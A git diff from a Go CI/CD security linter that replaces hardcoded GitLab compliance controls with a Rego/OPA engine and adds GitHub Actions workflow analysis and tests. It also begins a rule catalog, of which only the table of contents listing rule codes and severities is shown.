+ if c := pc.Controls.PipelineMustIncludeComponent; c != nil && c.IsEnabled() {
+ if groups, err := c.GetResolvedRequiredGroups(); err == nil && len(groups) > 0 {
+ cfg["pipelineMustIncludeComponent"] = map[string]any{
+ "requiredGroups": toAnyGroups(groups),
+ }
+ }
+ }
+
+ if c := pc.Controls.PipelineMustIncludeTemplate; c != nil && c.IsEnabled() {
+ if groups, err := c.GetResolvedRequiredGroups(); err == nil && len(groups) > 0 {
+ cfg["pipelineMustIncludeTemplate"] = map[string]any{
+ "requiredGroups": toAnyGroups(groups),
+ }
+ }
+ }
+
+ if c := pc.Controls.ActionsMustBePinnedByCommitSha; c != nil && c.IsEnabled() {
+ entry := map[string]any{}
+ if len(c.TrustedOwners) > 0 {
+ entry["trustedOwners"] = c.TrustedOwners
+ }
+ cfg["actionsMustBePinnedByCommitSha"] = entry
+ }
+
+ if len(cfg) == 0 {
+ return nil
+ }
+ return cfg
+}
+
+// toAnyGroups converts a [][]string (DNF requiredGroups) into a nested
+// []any slice so OPA sees it as a plain JSON array of arrays.
+func toAnyGroups(groups [][]string) []any {
+ out := make([]any, len(groups))
+ for i, g := range groups {
+ inner := make([]any, len(g))
+ for j, p := range g {
+ inner[j] = p
+ }
+ out[i] = inner
+ }
+ return out
+}
+
// RunAnalysis executes the complete pipeline analysis for a GitLab project
func RunAnalysis(conf *configuration.Configuration) (*AnalysisResult, error) {
l := l.WithFields(logrus.Fields{
@@ -100,14 +283,8 @@ func RunAnalysis(conf *configuration.Configuration) (*AnalysisResult, error) {
project, err := gitlab.FetchProjectDetails(conf.ProjectPath, conf.GitlabToken, conf.GitlabURL, conf)
if err != nil {
l.WithError(err).Error("Failed to fetch project from GitLab")
- // Cannot fetch project - compliance is 0
result.CiValid = false
result.CiMissing = true
- result.ImageForbiddenTagsResult = &GitlabImageForbiddenTagsResult{
- Version: ControlTypeGitlabImageForbiddenTagsVersion,
- Compliance: 0,
- Error: err.Error(),
- }
return result, err
}
@@ -201,14 +378,8 @@ func RunAnalysis(conf *configuration.Configuration) (*AnalysisResult, error) {
pipelineOriginData, pipelineOriginMetrics, err := originDC.Run(projectInfo, conf.GitlabToken, conf)
if err != nil {
l.WithError(err).Error("Pipeline Origin data collection failed")
- // Data collection failed - compliance is 0, cannot continue to controls
result.CiValid = false
result.CiMissing = true
- result.ImageForbiddenTagsResult = &GitlabImageForbiddenTagsResult{
- Version: ControlTypeGitlabImageForbiddenTagsVersion,
- Compliance: 0,
- Error: err.Error(),
- }
return result, err
}
@@ -253,12 +424,6 @@ func RunAnalysis(conf *configuration.Configuration) (*AnalysisResult, error) {
pipelineImageData, pipelineImageMetrics, err := imageDC.Run(projectInfo, conf.GitlabToken, conf, pipelineOriginData)
if err != nil {
l.WithError(err).Error("Pipeline Image data collection failed")
- // Data collection failed - compliance is 0, cannot continue to controls
- result.ImageForbiddenTagsResult = &GitlabImageForbiddenTagsResult{
- Version: ControlTypeGitlabImageForbiddenTagsVersion,
- Compliance: 0,
- Error: err.Error(),
- }
return result, err
}
@@ -273,268 +438,30 @@ func RunAnalysis(conf *configuration.Configuration) (*AnalysisResult, error) {
result.PipelineImageData = pipelineImageData
result.PipelineOriginData = pipelineOriginData
- ///////////////////
- // Run Controls
- ///////////////////
-
- // 3. Run Forbidden Image Tags control
- reportProgress(conf, 4, analysisStepCount, "Checking forbidden image tags")
- l.Info("Running Forbidden Image Tags control")
-
- // Load control configuration from PlumberConfig (required)
- forbiddenTagsConf := &GitlabImageForbiddenTagsConf{}
- if shouldRunControl(controlContainerImageMustNotUseForbiddenTags, conf) {
- if err := forbiddenTagsConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load ImageForbiddenTags config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- forbiddenTagsConf.Enabled = false
- }
-
- forbiddenTagsResult := forbiddenTagsConf.Run(pipelineImageData)
- result.ImageForbiddenTagsResult = forbiddenTagsResult
-
- // 4. Run Image Authorized Sources control
- reportProgress(conf, 5, analysisStepCount, "Checking authorized image sources")
- l.Info("Running Image Authorized Sources control")
-
- authorizedSourcesConf := &GitlabImageAuthorizedSourcesConf{}
- if shouldRunControl(controlContainerImageMustComeFromAuthorizedSources, conf) {
- if err := authorizedSourcesConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load ImageAuthorizedSources config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- authorizedSourcesConf.Enabled = false
- }
-
- authorizedSourcesResult := authorizedSourcesConf.Run(pipelineImageData)
- result.ImageAuthorizedSourcesResult = authorizedSourcesResult
-
- // 5. Run Pipeline Must Not Include Hardcoded Jobs control
- reportProgress(conf, 6, analysisStepCount, "Checking hardcoded jobs")
- l.Info("Running Pipeline Must Not Include Hardcoded Jobs control")
-
- hardcodedJobsConf := &GitlabPipelineHardcodedJobsConf{}
- if shouldRunControl(controlPipelineMustNotIncludeHardcodedJobs, conf) {
- if err := hardcodedJobsConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load HardcodedJobs config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- hardcodedJobsConf.Enabled = false
- }
-
- hardcodedJobsResult := hardcodedJobsConf.Run(pipelineOriginData)
- result.HardcodedJobsResult = hardcodedJobsResult
-
- // 6. Run Includes Must Be Up To Date control
- reportProgress(conf, 7, analysisStepCount, "Checking includes versions")
- l.Info("Running Includes Must Be Up To Date control")
-
- outdatedConf := &GitlabPipelineIncludesOutdatedConf{}
- if shouldRunControl(controlIncludesMustBeUpToDate, conf) {
- if err := outdatedConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load IncludesOutdated config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- outdatedConf.Enabled = false
- }
-
- outdatedResult := outdatedConf.Run(pipelineOriginData)
- result.OutdatedIncludesResult = outdatedResult
-
- // 7. Run Includes Must Not Use Forbidden Versions control
- reportProgress(conf, 8, analysisStepCount, "Checking forbidden versions")
- l.Info("Running Includes Must Not Use Forbidden Versions control")
-
- forbiddenVersionConf := &GitlabPipelineIncludesForbiddenVersionConf{}
- if shouldRunControl(controlIncludesMustNotUseForbiddenVersions, conf) {
- if err := forbiddenVersionConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load ForbiddenVersions config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- forbiddenVersionConf.Enabled = false
- }
-
- forbiddenVersionResult := forbiddenVersionConf.Run(pipelineOriginData, projectInfo.DefaultBranch)
- result.ForbiddenVersionsIncludesResult = forbiddenVersionResult
-
- // 8. Run Branch Must Be Protected control (if enabled)
- reportProgress(conf, 9, analysisStepCount, "Checking branch protection")
+ // Fetch branch-protection metadata when the user configured the
+ // corresponding control β the Rego policy needs the protection
+ // settings to check every branch against the declared bar.
+ var protectionData *collector.GitlabProtectionAnalysisData
if shouldRunControl(controlBranchMustBeProtected, conf) {
- branchProtectionConfig := conf.PlumberConfig.GetBranchMustBeProtectedConfig()
- if branchProtectionConfig != nil && branchProtectionConfig.IsEnabled() {
- l.Info("Running Branch Must Be Protected control")
-
- // Run Protection data collection first
+ if cfg := conf.PlumberConfig.GetBranchMustBeProtectedConfig(); cfg != nil && cfg.IsEnabled() {
+ reportProgress(conf, 9, analysisStepCount, "Checking branch protection")
protectionDC := &collector.GitlabProtectionDataCollection{}
- protectionData, _, err := protectionDC.Run(projectInfo, conf.GitlabToken, conf)
- if err != nil {
- l.WithError(err).Error("Protection data collection failed")
- // Data collection failed - set compliance to 0 but continue
- result.BranchProtectionResult = &GitlabBranchProtectionResult{
- Enabled: true,
- Compliance: 0,
- Version: ControlTypeGitlabProtectionBranchProtectionNotCompliantVersion,
- Error: err.Error(),
- }
+ pData, _, pErr := protectionDC.Run(projectInfo, conf.GitlabToken, conf)
+ if pErr != nil {
+ l.WithError(pErr).Warn("Protection data collection failed; branch policies will see no branches")
} else {
- // Run the branch protection control
- branchProtectionControl := NewGitlabBranchProtectionControl(branchProtectionConfig)
- branchProtectionResult := branchProtectionControl.Run(protectionData, projectInfo)
- result.BranchProtectionResult = branchProtectionResult
+ protectionData = pData
}
- } else {
- l.Debug("Branch Must Be Protected control is disabled or not configured")
- }
- } else {
- result.BranchProtectionResult = &GitlabBranchProtectionResult{
- Enabled: false,
- Skipped: true,
- Compliance: 100.0,
- Version: ControlTypeGitlabProtectionBranchProtectionNotCompliantVersion,
- }
- }
-
- // 9. Run Pipeline Must Include Component control
- reportProgress(conf, 10, analysisStepCount, "Checking required components")
- l.Info("Running Pipeline Must Include Component control")
-
- requiredComponentsConf := &GitlabPipelineRequiredComponentsConf{}
- if shouldRunControl(controlPipelineMustIncludeComponent, conf) {
- if err := requiredComponentsConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load RequiredComponents config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
}
- } else {
- requiredComponentsConf.Enabled = false
}
- requiredComponentsResult := requiredComponentsConf.Run(pipelineOriginData, conf.GitlabURL)
- result.RequiredComponentsResult = requiredComponentsResult
-
- // 10. Run Pipeline Must Include Template control
- reportProgress(conf, 11, analysisStepCount, "Checking required templates")
- l.Info("Running Pipeline Must Include Template control")
-
- requiredTemplatesConf := &GitlabPipelineRequiredTemplatesConf{}
- if shouldRunControl(controlPipelineMustIncludeTemplate, conf) {
- if err := requiredTemplatesConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load RequiredTemplates config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- requiredTemplatesConf.Enabled = false
- }
-
- requiredTemplatesResult := requiredTemplatesConf.Run(pipelineOriginData)
- result.RequiredTemplatesResult = requiredTemplatesResult
-
- // 11. Run Pipeline Must Not Enable Debug Trace control
- reportProgress(conf, 12, analysisStepCount, "Checking debug trace variables")
- l.Info("Running Pipeline Must Not Enable Debug Trace control")
-
- debugTraceConf := &GitlabPipelineDebugTraceConf{}
- if shouldRunControl(controlPipelineMustNotEnableDebugTrace, conf) {
- if err := debugTraceConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load DebugTrace config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- debugTraceConf.Enabled = false
- }
-
- debugTraceResult := debugTraceConf.Run(pipelineOriginData)
- result.DebugTraceResult = debugTraceResult
-
- // 12. Run Pipeline Must Not Use Unsafe Variable Expansion control
- reportProgress(conf, 13, analysisStepCount, "Checking unsafe variable expansion")
- l.Info("Running Pipeline Must Not Use Unsafe Variable Expansion control")
-
- variableInjectionConf := &GitlabPipelineVariableInjectionConf{}
- if shouldRunControl(controlPipelineMustNotUseUnsafeVariableExpansion, conf) {
- if err := variableInjectionConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load VariableInjection config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- variableInjectionConf.Enabled = false
- }
-
- variableInjectionResult := variableInjectionConf.Run(pipelineOriginData)
- result.VariableInjectionResult = variableInjectionResult
-
- // 13. Run Security Jobs Must Not Be Weakened control
- reportProgress(conf, 14, analysisStepCount, "Checking security jobs weakening")
- l.Info("Running Security Jobs Must Not Be Weakened control")
-
- securityJobsWeakenedConf := &GitlabSecurityJobsWeakenedConf{}
- if shouldRunControl(controlSecurityJobsMustNotBeWeakened, conf) {
- if err := securityJobsWeakenedConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load SecurityJobsWeakened config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- securityJobsWeakenedConf.Enabled = false
+ // Rego/OPA rule engine evaluation. With all 19 historical Go
+ // controls retired (see docs/REFACTOR_MULTI_PROVIDER.md Β§8 Phase A),
+ // the engine is the single authoritative compliance path.
+ if conf.PlumberConfig.IsEngineEnabled() {
+ result.Findings = runRegoEngine(l, conf, project, pipelineOriginData, pipelineImageData, protectionData)
}
-
- securityJobsWeakenedResult := securityJobsWeakenedConf.Run(pipelineOriginData)
- result.SecurityJobsWeakenedResult = securityJobsWeakenedResult
-
- // 14. Run Pipeline Must Not Execute Unverified Scripts control
- reportProgress(conf, 15, analysisStepCount, "Checking unverified script execution")
- l.Info("Running Pipeline Must Not Execute Unverified Scripts control")
-
- unverifiedScriptsConf := &GitlabPipelineUnverifiedScriptsConf{}
- if shouldRunControl(controlPipelineMustNotExecuteUnverifiedScripts, conf) {
- if err := unverifiedScriptsConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load UnverifiedScripts config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- unverifiedScriptsConf.Enabled = false
- }
-
- unverifiedScriptsResult := unverifiedScriptsConf.Run(pipelineOriginData)
- result.UnverifiedScriptsResult = unverifiedScriptsResult
-
- // 15. Run Pipeline Must Not Override Job Variables control
- reportProgress(conf, 16, analysisStepCount, "Checking job variable overrides")
- l.Info("Running Pipeline Must Not Override Job Variables control")
-
- jobVarOverrideConf := &GitlabPipelineJobVariablesOverrideConf{}
- if shouldRunControl(controlPipelineMustNotOverrideJobVariables, conf) {
- if err := jobVarOverrideConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load JobVariablesOverride config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- jobVarOverrideConf.Enabled = false
- }
-
- jobVarOverrideResult := jobVarOverrideConf.Run(pipelineOriginData)
- result.JobVariablesOverrideResult = jobVarOverrideResult
-
- // 16. Run Pipeline Must Not Use Docker-in-Docker control
- reportProgress(conf, 17, analysisStepCount, "Checking Docker-in-Docker services")
- l.Info("Running Pipeline Must Not Use Docker-in-Docker control")
-
- dockerInDockerConf := &GitlabPipelineDockerInDockerConf{}
- if shouldRunControl(controlPipelineMustNotUseDockerInDocker, conf) {
- if err := dockerInDockerConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load DockerInDocker config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- dockerInDockerConf.Enabled = false
- }
-
- dockerInDockerResult := dockerInDockerConf.Run(pipelineOriginData)
- result.DockerInDockerResult = dockerInDockerResult
+ result.ProtectionData = protectionData
reportProgress(conf, analysisStepCount, analysisStepCount, "Analysis complete")
diff --git a/control/task_github.go b/control/task_github.go
new file mode 100644
index 0000000..27af238
--- /dev/null
+++ b/control/task_github.go
@@ -0,0 +1,69 @@
+package control
+
+import (
+ "github.com/getplumber/plumber/collector"
+ "github.com/getplumber/plumber/configuration"
+ "github.com/sirupsen/logrus"
+)
+
+// RunGitHubAnalysis is the GitHub counterpart of RunAnalysis. It scans
+// .github/workflows/*.{yml,yaml} under conf.GitRepoRoot, evaluates the
+// embedded Rego policies against the resulting IR, and returns an
+// AnalysisResult whose only populated fields are the project metadata
+// and Findings. No legacy Go control fields are set β GitHub support is
+// Rego-only by design (see docs/REFACTOR_MULTI_PROVIDER.md Β§4).
+func RunGitHubAnalysis(conf *configuration.Configuration) (*AnalysisResult, error) {
+ l := logrus.WithFields(logrus.Fields{
+ "action": "RunGitHubAnalysis",
+ "projectPath": conf.ProjectPath,
+ "gitRepoRoot": conf.GitRepoRoot,
+ })
+ l.Info("Starting GitHub Actions analysis")
+
+ // Forward conf.ProgressFunc to the collector so the analyze-
+ // command spinner animates during the slow GitHub API enrichment
+ // phase. The collector's progress contract is ProgressFunc(step,
+ // total, message); we map directly onto the same-shape callback
+ // conf exposes.
+ var progressFn collector.ProgressFunc
+ if conf.ProgressFunc != nil {
+ progressFn = collector.ProgressFunc(conf.ProgressFunc)
+ }
+ pipeline, partial, err := collector.ScanGitHubWorkflowsWithProgress(
+ conf.ProjectPath,
+ conf.Branch,
+ conf.GitRepoRoot,
+ progressFn,
+ )
+ if err != nil {
+ l.WithError(err).Error("Failed to scan GitHub workflows")
+ return nil, err
+ }
+ for _, perr := range partial {
+ l.WithError(perr).Warn("GitHub workflow parse: partial failure (file skipped)")
+ }
+
+ if conf.ProgressFunc != nil {
+ total := collector.TotalProgressStepsForPipeline(pipeline)
+ conf.ProgressFunc(total-1, total, "Evaluating policies")
+ }
+ result := &AnalysisResult{
+ ProjectPath: conf.ProjectPath,
+ DefaultBranch: conf.Branch,
+ CIConfigSource: "local",
+ CiValid: len(pipeline.Jobs) > 0,
+ CiMissing: len(pipeline.Jobs) == 0,
+ Findings: evaluatePolicies(l, conf.PlumberConfig, pipeline),
+ }
+ if conf.ProgressFunc != nil {
+ total := collector.TotalProgressStepsForPipeline(pipeline)
+ conf.ProgressFunc(total, total, "Analysis complete")
+ }
+
+ l.WithFields(logrus.Fields{
+ "jobCount": len(pipeline.Jobs),
+ "findingCount": len(result.Findings),
+ }).Info("GitHub Actions analysis completed")
+
+ return result, nil
+}
diff --git a/control/task_github_test.go b/control/task_github_test.go
new file mode 100644
index 0000000..ad7c2b0
--- /dev/null
+++ b/control/task_github_test.go
@@ -0,0 +1,103 @@
+package control
+
+import (
+ "os"
+ "path/filepath"
+ "testing"
+
+ "github.com/getplumber/plumber/configuration"
+)
+
+func TestRunGitHubAnalysis_EndToEnd(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ workflow := `name: CI
+on: push
+jobs:
+ lint:
+ runs-on: ubuntu-latest
+ container: alpine:latest
+ test:
+ runs-on: ubuntu-latest
+ container:
+ image: node:20.10.0
+`
+ if err := os.WriteFile(filepath.Join(wfDir, "ci.yml"), []byte(workflow), 0o644); err != nil {
+ t.Fatal(err)
+ }
+
+ enabled := true
+ conf := &configuration.Configuration{
+ ProjectPath: "owner/repo",
+ Branch: "main",
+ GitRepoRoot: tmp,
+ PlumberConfig: &configuration.PlumberConfig{
+ Controls: configuration.ControlsConfig{
+ ContainerImageMustNotUseForbiddenTags: &configuration.ImageForbiddenTagsControlConfig{
+ Enabled: &enabled,
+ Tags: []string{"latest"},
+ },
+ },
+ Engine: &configuration.EngineConfig{Enabled: &enabled},
+ },
+ }
+
+ result, err := RunGitHubAnalysis(conf)
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if result == nil {
+ t.Fatal("expected result, got nil")
+ }
+ if !result.CiValid {
+ t.Error("expected CiValid=true (jobs discovered)")
+ }
+ if result.CiMissing {
+ t.Error("expected CiMissing=false")
+ }
+
+ hits := map[string]int{}
+ for _, f := range result.Findings {
+ hits[f.Code+":"+f.Job]++
+ }
+ // alpine:latest on ci/lint must flag; node:20.10.0 on ci/test must not.
+ if hits["ISSUE-102:ci/lint"] != 1 {
+ t.Errorf("expected 1 ISSUE-102 on ci/lint, got %+v", hits)
+ }
+ if hits["ISSUE-102:ci/test"] != 0 {
+ t.Errorf("unexpected finding on ci/test, got %+v", hits)
+ }
+ // Test asserts on ISSUE-102 only β unrelated defaults-on rules
+ // (ISSUE-304 undocumented permissions, ISSUE-602 no concurrency,
+ // β¦) also fire on this intentionally-minimal fixture and are
+ // tracked in their own suites.
+ if hits["ISSUE-102:ci/lint"]+hits["ISSUE-102:ci/test"] != 1 {
+ t.Errorf("expected exactly 1 ISSUE-102 finding, got %+v", hits)
+ }
+}
+
+func TestRunGitHubAnalysis_NoWorkflows(t *testing.T) {
+ tmp := t.TempDir()
+ conf := &configuration.Configuration{
+ ProjectPath: "owner/repo",
+ GitRepoRoot: tmp,
+ PlumberConfig: &configuration.PlumberConfig{},
+ }
+
+ result, err := RunGitHubAnalysis(conf)
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if result.CiValid {
+ t.Error("expected CiValid=false when no workflows")
+ }
+ if !result.CiMissing {
+ t.Error("expected CiMissing=true when no workflows")
+ }
+ if len(result.Findings) != 0 {
+ t.Errorf("expected no findings, got %d", len(result.Findings))
+ }
+}
diff --git a/control/testmain_test.go b/control/testmain_test.go
new file mode 100644
index 0000000..1ce8a52
--- /dev/null
+++ b/control/testmain_test.go
@@ -0,0 +1,16 @@
+package control
+
+import (
+ "os"
+ "testing"
+)
+
+// TestMain disables the collector's GitHub API metadata enrichment
+// globally for the control package's tests. See the matching file
+// under policies/ for the rationale.
+func TestMain(m *testing.M) {
+ if err := os.Setenv("PLUMBER_DISABLE_GITHUB_API", "1"); err != nil {
+ panic(err)
+ }
+ os.Exit(m.Run())
+}
diff --git a/control/types.go b/control/types.go
index 4cc7a14..b16bf44 100644
--- a/control/types.go
+++ b/control/types.go
@@ -2,6 +2,7 @@ package control
import (
"github.com/getplumber/plumber/collector"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
"github.com/sirupsen/logrus"
)
@@ -26,25 +27,17 @@ type AnalysisResult struct {
// Pipeline image data
PipelineImageMetrics *PipelineImageMetricsSummary `json:"pipelineImageMetrics,omitempty"`
- // Control results
- ImageForbiddenTagsResult *GitlabImageForbiddenTagsResult `json:"imageForbiddenTagsResult,omitempty"`
- ImageAuthorizedSourcesResult *GitlabImageAuthorizedSourcesResult `json:"imageAuthorizedSourcesResult,omitempty"`
- BranchProtectionResult *GitlabBranchProtectionResult `json:"branchProtectionResult,omitempty"`
- HardcodedJobsResult *GitlabPipelineHardcodedJobsResult `json:"hardcodedJobsResult,omitempty"`
- OutdatedIncludesResult *GitlabPipelineIncludesOutdatedResult `json:"outdatedIncludesResult,omitempty"`
- ForbiddenVersionsIncludesResult *GitlabPipelineIncludesForbiddenVersionResult `json:"forbiddenVersionsIncludesResult,omitempty"`
- RequiredComponentsResult *GitlabPipelineRequiredComponentsResult `json:"requiredComponentsResult,omitempty"`
- RequiredTemplatesResult *GitlabPipelineRequiredTemplatesResult `json:"requiredTemplatesResult,omitempty"`
- DebugTraceResult *GitlabPipelineDebugTraceResult `json:"debugTraceResult,omitempty"`
- VariableInjectionResult *GitlabPipelineVariableInjectionResult `json:"variableInjectionResult,omitempty"`
- SecurityJobsWeakenedResult *GitlabSecurityJobsWeakenedResult `json:"securityJobsWeakenedResult,omitempty"`
- UnverifiedScriptsResult *GitlabPipelineUnverifiedScriptsResult `json:"unverifiedScriptsResult,omitempty"`
- JobVariablesOverrideResult *GitlabPipelineJobVariablesOverrideResult `json:"jobVariablesOverrideResult,omitempty"`
- DockerInDockerResult *GitlabPipelineDockerInDockerResult `json:"dockerInDockerResult,omitempty"`
-
- // Raw collected data (not included in JSON output, used for PBOM generation)
- PipelineImageData *collector.GitlabPipelineImageData `json:"-"`
- PipelineOriginData *collector.GitlabPipelineOriginData `json:"-"`
+ // Findings from the Rego/OPA rule engine. Single source of truth
+ // for compliance results since all legacy Go controls were retired
+ // (see docs/REFACTOR_MULTI_PROVIDER.md Β§8 Phase A).
+ Findings []opaengine.Finding `json:"findings,omitempty"`
+
+ // Raw collected data (not included in JSON output, used for PBOM generation
+ // and for the per-control aggregated stats block printed under each
+ // control header in the terminal output).
+ PipelineImageData *collector.GitlabPipelineImageData `json:"-"`
+ PipelineOriginData *collector.GitlabPipelineOriginData `json:"-"`
+ ProtectionData *collector.GitlabProtectionAnalysisData `json:"-"`
}
// PipelineOriginMetricsSummary is a simplified version of origin metrics for output
diff --git a/control/utils.go b/control/utils.go
deleted file mode 100644
index f51566d..0000000
--- a/control/utils.go
+++ /dev/null
@@ -1,103 +0,0 @@
-package control
-
-import (
- "encoding/json"
- "fmt"
- "regexp"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/utils"
-)
-
-// overridesRegex matches forbidden override keywords in a job's JSON representation.
-// These are CI/CD keywords that, when present in the hardcoded (overridden) content,
-// indicate the user has meaningfully overridden a component/template's behavior.
-const overridesRegex = `(?i)"(after_script|allow_failure|artifacts|before_script|cache|coverage|dast_configuration|dependencies|environment|identity|image|inherit|interruptible|manual_confirmation|needs|pages|parallel|release|resource_group|retry|rules|script|secrets|services|stage|tags|timeout|trigger|when)":`
-
-var compiledOverridesRegex = regexp.MustCompile(overridesRegex)
-
-
-// getOriginOverriddenJobs returns per-job override details for an origin.
-// Jobs are deduplicated by name (the same job can appear multiple times
-// in an origin's Jobs slice from both direct and extends-based matching).
-// Returns nil if no jobs have forbidden overrides.
-func getOriginOverriddenJobs(origin *collector.GitlabPipelineOriginDataFull, data *collector.GitlabPipelineOriginData) []utils.OverriddenJobDetail {
- seen := make(map[string]bool)
- var details []utils.OverriddenJobDetail
- for _, job := range origin.Jobs {
- if job.IsOverridden && !seen[job.Name] {
- seen[job.Name] = true
- keys := getForbiddenOverrideKeys(data.JobHardcodedContent[job.Name])
- if len(keys) > 0 {
- details = append(details, utils.OverriddenJobDetail{
- JobName: job.Name,
- OverriddenKeys: keys,
- })
- }
- }
- }
- return details
-}
-
-// getForbiddenOverrideKeys returns the list of forbidden CI/CD keywords found
-// in a job's hardcoded (overridden) content. Returns nil if none are found.
-func getForbiddenOverrideKeys(job interface{}) []string {
- if job == nil {
- return nil
- }
-
- serializable := convertToSerializable(job)
-
- jobJSON, err := json.Marshal(serializable)
- if err != nil {
- l.WithError(err).WithField("job", job).Error("Unable to marshal job content to JSON for override check")
- return nil
- }
-
- matches := compiledOverridesRegex.FindAllSubmatch(jobJSON, -1)
- if len(matches) == 0 {
- return nil
- }
-
- seen := make(map[string]bool)
- var keys []string
- for _, m := range matches {
- key := string(m[1])
- if !seen[key] {
- seen[key] = true
- keys = append(keys, key)
- }
- }
- return keys
-}
-
-// convertToSerializable converts a map[interface{}]interface{} to map[string]interface{}
-// recursively to make it JSON serializable (YAML unmarshalling produces the former).
-func convertToSerializable(input interface{}) interface{} {
- switch v := input.(type) {
- case map[interface{}]interface{}:
- result := make(map[string]interface{})
- for key, value := range v {
- keyStr, ok := key.(string)
- if !ok {
- keyStr = fmt.Sprintf("%v", key)
- }
- result[keyStr] = convertToSerializable(value)
- }
- return result
- case map[string]interface{}:
- result := make(map[string]interface{})
- for key, value := range v {
- result[key] = convertToSerializable(value)
- }
- return result
- case []interface{}:
- result := make([]interface{}, len(v))
- for i, item := range v {
- result[i] = convertToSerializable(item)
- }
- return result
- default:
- return v
- }
-}
diff --git a/docs/GITHUB_ISSUES.md b/docs/GITHUB_ISSUES.md
new file mode 100644
index 0000000..dd25b6f
--- /dev/null
+++ b/docs/GITHUB_ISSUES.md
@@ -0,0 +1,1565 @@
+# GitHub Actions rule catalog
+
+Reference for every rule Plumber runs against GitHub Actions
+workflows. Each entry gives the trigger, the risk, and a compilable
+**before / after** remediation so you can drop the fix in without
+reading the upstream docs.
+
+## Table of contents
+
+### Supply chain β `1xx`
+
+| Code | Name | Severity |
+| :--- | :--- | :--- |
+| [ISSUE-102](#issue-102--image-mutable-tag) | `image-mutable-tag` | high |
+| [ISSUE-103](#issue-103--image-not-pinned-by-digest) | `image-not-pinned-by-digest` | high |
+| [ISSUE-104](#issue-104--action-unpinned) | `action-unpinned` | high |
+| [ISSUE-105](#issue-105--container-hardcoded-credentials) | `container-hardcoded-credentials` | **critical** |
+| [ISSUE-106](#issue-106--cache-poisoning) | `cache-poisoning` | high |
+| [ISSUE-107](#issue-107--dockerfile-unpinned-base) | `dockerfile-unpinned-base` | medium |
+| [ISSUE-108](#issue-108--action-archived-repo) | `action-archived-repo` | high _(API)_ |
+| [ISSUE-109](#issue-109--impostor-commit) | `impostor-commit` | **critical** _(API)_ |
+| [ISSUE-110](#issue-110--ref-version-mismatch) | `ref-version-mismatch` | medium _(API)_ |
+| [ISSUE-111](#issue-111--stale-action-ref) | `stale-action-ref` | low _(API)_ |
+| [ISSUE-112](#issue-112--release-workflow-unsigned) | `release-workflow-unsigned` | medium |
+| [ISSUE-113](#issue-113--ref-confusion) | `ref-confusion` | medium _(API)_ |
+| [ISSUE-114](#issue-114--known-vulnerable-action) | `known-vulnerable-action` | **critical** _(API)_ |
+| [ISSUE-115](#issue-115--superfluous-action) | `superfluous-action` | low |
+
+### Expressions & injections β `2xx`
+
+| Code | Name | Severity |
+| :--- | :--- | :--- |
+| [ISSUE-206](#issue-206--template-injection) | `template-injection` | **critical** |
+| [ISSUE-208](#issue-208--insecure-commands) | `insecure-commands` | high |
+| [ISSUE-209](#issue-209--github-env-injection) | `github-env-injection` | **critical** |
+| [ISSUE-210](#issue-210--bot-conditions) | `bot-conditions` | high |
+| [ISSUE-211](#issue-211--unsound-condition) | `unsound-condition` | medium |
+| [ISSUE-212](#issue-212--unsound-contains) | `unsound-contains` | medium |
+| [ISSUE-213](#issue-213--unsafe-github-context-dump) | `unsafe-github-context-dump` | high |
+| [ISSUE-214](#issue-214--unpinned-package-install) | `unpinned-package-install` | medium |
+| [ISSUE-215](#issue-215--template-injection-vars) | `template-injection-vars` | low |
+
+### Secrets, credentials & permissions β `3xx`
+
+| Code | Name | Severity |
+| :--- | :--- | :--- |
+| [ISSUE-301](#issue-301--overprovisioned-secrets) | `overprovisioned-secrets` | **critical** |
+| [ISSUE-302](#issue-302--secrets-inherit) | `secrets-inherit` | high |
+| [ISSUE-303](#issue-303--unredacted-secrets) | `unredacted-secrets` | high |
+| [ISSUE-304](#issue-304--undocumented-permissions) | `undocumented-permissions` | medium |
+| [ISSUE-305](#issue-305--secrets-outside-env) | `secrets-outside-env` | medium |
+| [ISSUE-306](#issue-306--github-app-skip-revoke) | `github-app-skip-revoke` | high |
+| [ISSUE-307](#issue-307--artipacked) | `artipacked` | high |
